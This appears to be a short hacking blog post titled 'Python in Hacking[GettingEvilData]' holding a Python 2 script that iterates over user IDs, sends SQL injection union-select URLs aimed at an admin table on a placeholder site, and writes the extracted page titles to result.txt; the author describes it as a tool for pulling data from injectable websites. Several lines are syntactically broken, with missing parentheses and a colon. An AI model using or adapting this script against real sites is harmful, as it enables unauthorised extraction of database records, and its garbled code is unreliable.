Python in Hacking[GettingEvilData]

  
  
  
  
  1. #!/usr/bin/python 
  2. #  -*- coding:utf-8 -*- 
  3.  
  4. import urllib2 
  5. import re 
  6. import string 
  7. from sgmllib import SGMLParser 
  8. class getTitle(SGMLParser): 
  9.     istitle = 0 
  10.     name = [] 
  11.     def reset(self): 
  12.         SGMLParser.reset(self
  13.     def start_title(self,attrs): 
  14.             self.istitle = 1 
  15.     def end_title(self): 
  16.             self.istitle = 0 
  17.     def handle_data(self,data): 
  18.         if self.istitle: 
  19.             self.name.append(data) 
  20. index=0 
  21. for count in xrange(18680,18690): 
  22.     url = "http://www.xxx.com/sqlin.php?id=1/**/and/**/1=1/**/union/**/select/**/*/**/from/**/admin**/where/**/uid="+str(count)+"--" 
  23.     req = urllib2.Request(url) 
  24.     fd = urllib2.urlopen(req) 
  25.     text = fd.read(2048
  26.     if not len(text): 
  27.         print "Nothing be getted..." 
  28.     else
  29.         title = getTitle() 
  30.         title.feed(text) 
  31.         mark=title.name[index].find('-'
  32.         print title.name[index][:mark]+"has been write into result.txt" 
  33.         fi=file("result.txt","a"
  34.         fi.writelines(title.name[index][:mark]) 
  35.         fi.writelines("\n"
  36.         index+=1 
  37.         
  38. fi.close() 

Pnig0s:This program is used to get data from a website which have a SQLInjection and write them to files.very smiple.

你可能感兴趣的:(python,职场,休闲,tip,hacking)